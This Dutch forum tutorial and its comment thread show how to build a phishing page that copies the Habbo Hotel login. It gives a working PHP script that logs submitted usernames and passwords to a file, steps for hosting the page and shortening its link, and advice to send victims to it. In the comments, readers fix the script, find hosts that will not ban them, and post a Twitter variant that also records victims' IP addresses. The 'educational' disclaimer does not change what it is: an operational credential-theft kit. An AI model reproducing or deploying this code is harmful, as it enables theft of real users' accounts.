Phising site maken
Dit is voor educatieve doeleinden, je mag dit NOOIT misbruiken. Als je dit toch van plan bent is het je eigen verantwoordelijkheid. Je bent gewaarschuwt.In deze tutorial ga ik je laten zien hoe je een phising site maakt, en wat het doet.
Een phising site is een site dat meestal een exacte kopie is van de site die je wilt bezoeken, alleen het login script is aangepast en slaat jou gegevens op zonder dat je het merkt. Bijv. met habbo hotel.
Benodigdheden
PHP editor - Notepad++ (Je kan andere gebruiken maar ik gebruik in de tutorial N++)
Webhost die PHP ondersteund - woelmuis.nl
Het echte werk
Als eerst gaan we de broncode van de site kopieëren en aanpassen, dit doe je door op rechtermuisknop te klikken op de gewenste site en klik op: 'Paginabron weergeven'. Selecteer nu alles, kan dmv. CTRL + A of rechtermuisknop en alles selecteren te klikken. Kopieër en plak de code in je editor.
Klik nu op CTRL+F(zoeken) en zoek naar: POST, als je meer dan 1 overeenkomst heb zoek je de meest logische uit, de login functie:
<form id="[b] login[/b]formitem" name="loginformitem" action="https://www.habbo.nl/account/submit"
method="post">Verander 'POST' (zonder de '') naar 'GET' en verander action="https://www.habbo.nl/account/submit" naar:
'login.php' (zonder '').
Dan heb je als het goed is dit:
<form id="loginformitem" name="loginformitem" action="login.php"
method="GET">Sla het vervolgens op als index.html (zorg ervoor dat er het geen .html.txt maar gewoon .html is.
Als je dat hebt gedaan kunnen we beginnen met het PHP gedeelte.
Maak een nieuw document met de volgende code erin:
<?php
header ('Location: http://habbo.nl/admin '); //de site waar je na het 'inloggen' terecht moet komen.
$handle = fopen("p4ssw0rds.txt", "a"); //dit is de naam van het tekstbestand waar de gegevens in terecht komen.
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "= ");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle) ;
exit;
?>
Sla dit op als login.php
Ga nu naar woelmuis(KLIK) en maak een nieuwe account.
Activeer je account door op de link in je mail(moet je invullen bij registreren),login en ga naar de File manager(KLIK) Upload je 2 bestanden.
Klik nu op je 'index.html' en login(met nepgegevens) op je phising site.
Als je nu opnieuw naar je file manager gaat is er een .txt bestand gemaakt met de door jou ingevulde gegevens.
Als je een kortere link wil kan je naar dot.tk gaan en daar je link in tevullen, klik op volgende vul de vereiste info in en klik onder Anoniem op bevestig. Je kan nu je ~site~.TK stuur mensen naar de site en je krijgt hun login gegevens!
//p03WS
Reacties (24)
In zo'n geval pakt hij vaak de images niet mee. Wat ik zou doen is de website eerst volledig opslaan zorgen dat alle images mee worden genomen en vervolgens gewoon if(isset($_POST['inloggen'])) oid. dan wegschrijven naar database en mailen. Maargoed, ieder heeft zn eigen manier.
@thekillerx daar zit wel wat in natuurlijk, maar het mailen van data werkt niet altijd want soms krijg je de mail niet. en als je het dan naar een txt schrijft heb je het altijd binnen handbereik
Daar zit ook wat in.
Maar in dat geval kun je dus de website alsnog volledig opslaan en dan inderdaad gebruik maken van fwrite etc. om het in een tekstbestand weg te schrijven.
Dan ondervind je ook geen problemen met eventuele afbeeldingen.
Maar in dat geval kun je dus de website alsnog volledig opslaan en dan inderdaad gebruik maken van fwrite etc. om het in een tekstbestand weg te schrijven.
Dan ondervind je ook geen problemen met eventuele afbeeldingen.
@ po3ws
ik ben hier nieuw (boeiend he...)
maar dat script wil niet lukken, tenminste de website precies "namaken" wel, maar de gegevens opslaan niet!
kan je me helpen?
ik ben hier nieuw (boeiend he...)
maar dat script wil niet lukken, tenminste de website precies "namaken" wel, maar de gegevens opslaan niet!
kan je me helpen?
ik heb dit alles ingevuld alleen als ik het bestandje waar de wachtwoorden in staan open dan staat er alleen maar wit weet iemand miss hoe dat komt?
Je moet het tekstbestand waarschijnlijk nog even chmodden naar 777. Dat kan je doen in de file manager van woelmuis.
thisegzz,
Welke webhost kan ik hiervoor gebruiken?
Als ik hem test is hij binnen 5 sec al uit de lucht!
Welke webhost kan ik hiervoor gebruiken?
Als ik hem test is hij binnen 5 sec al uit de lucht!
Woelmuis?
Ik Kan ook niet dat txt bestandje bekijken het is wit (geen tekst) en wat wordt er bedoeld met @Thisegzz Je moet het tekstbestand waarschijnlijk nog even chmodden naar 777
Je kunt als het goed is ergens de rechten van het tekstbestand aanpassen. Dit wordt chmodden genoemd. 777 geeft iedereen lees- en schrijfrechten, en dat is precies wat je moet hebben, want standaard kan je alleen maar lezen.
In de file manager kan je het waarschijnlijk bij de settings van het bestand vinden. Het is makkelijker om het via een FTP client te doen, dan kan je gewoon rechtermuisknop op het bestand doen en 'chmodden' (oid) kiezen.
In de file manager kan je het waarschijnlijk bij de settings van het bestand vinden. Het is makkelijker om het via een FTP client te doen, dan kan je gewoon rechtermuisknop op het bestand doen en 'chmodden' (oid) kiezen.
Thisegzz,
Omdat phishing sites illegaal zijn, worden ze geblocked, en nu ben ik dus bij woelmuis ge-IP-banned.
Andere webhost om het te testen?
Omdat phishing sites illegaal zijn, worden ze geblocked, en nu ben ik dus bij woelmuis ge-IP-banned.
Andere webhost om het te testen?
Er zijn er genoeg te vinden: http://www.free-webhosts.com/free-php-webhosting.php
Ik heb dit gedaan en mijn text bestandje ziet ook wit.. ik het de bestandsrechten via filezila gewijzigd naar 777, maar toch is het nog steeds wit als ik het getest heb en open... hoekomt dit?
Ik denk dat ik heb gevonden waarom.. die 777 van chmod valt atlijd weg, ik deed het met filezila, maar als ik filezila sluit en weer open, en ik klik weer op bestandsrechten staat er terug 770 ofzo...
Is het opgelost?
Als het nog steeds niet lukt: probeer het eens met een FTP programma.
Als het nog steeds niet lukt: probeer het eens met een FTP programma.
Ik deed het met filezila, het lukt gwn niet.. het verspringt altijd trug
mijn vriend heeft nt een ondeking gedaan
foreach($_POST as $variable => $value) {
moet zijn: foreach($_GET as $variable => $value) {
als het goed is doet ie het dan(bij mij dan)
foreach($_POST as $variable => $value) {
moet zijn: foreach($_GET as $variable => $value) {
als het goed is doet ie het dan(bij mij dan)
Goed gevonden, ik heb het aangepast 
hoe doe je dat dan bij andere websites heb het al geprobeerd en het lukt niet 
bij habbo lukt het wel
@lukas dat komt omdat de links naar plaatjes en andere bestanden dan relatief zijn. ("/pad/naar/bestand" i.p.v "http://website.com/pad/naar/bestand") Dan zou je alle bestanden waar naar gelinkt wordt op moeten slaan op je eigen server. Het werkt wel altijd met website's die beginnen met https:// omdat de links van die website's absouluut zijn.
help me er komen wel bytes bij in passwords.text allleen als ik in filemanager bestand open ist wit
thanks 
werkt goed!!!
werkt goed!!!
- Code: Selecteer alles
<?php
header ('Location: https://twitter.com/#!/login/error ');
$handle = fopen("log.html", "a"); //dit is de naam van het tekstbestand waar de gegevens in terecht komen.
$ip = $_SERVER ['REMOTE_ADDR'] ; // IP logger
$today = date("d M Y h:i A");
foreach($_GET as $variable => $value) {
fwrite($handle, "\r\n");
fwrite($handle, "</br>");
fwrite($handle, "<u>");
fwrite($handle, $variable);
fwrite($handle, "</u>");
fwrite($handle, ": ");
fwrite($handle, $value);
}
fwrite($handle, "\r\n");
fwrite($handle, "</br>");
fwrite($handle, "<u>");
fwrite($handle, "Remote adres: ");
fwrite($handle, "</u>");
fwrite($handle, $ip);
fwrite($handle, "\r\n");
fwrite($handle, "</br>");
fwrite($handle, "<u>");
fwrite($handle, "Timestamp: ");
fwrite($handle, "</u>");
fwrite($handle, $today);
fwrite($handle, "\r\n");
fwrite($handle, "</br>");
fwrite($handle, "-------------------------------------------");
fclose($handle) ;
exit;
?>
Plaats reactie
Alleen leden kunnen reacties plaatsen. Ga naar de inlogpagina of word gratis lid van DigitalPlace.nl.
Details
Jouw mening
Updates
Opties
thekillerx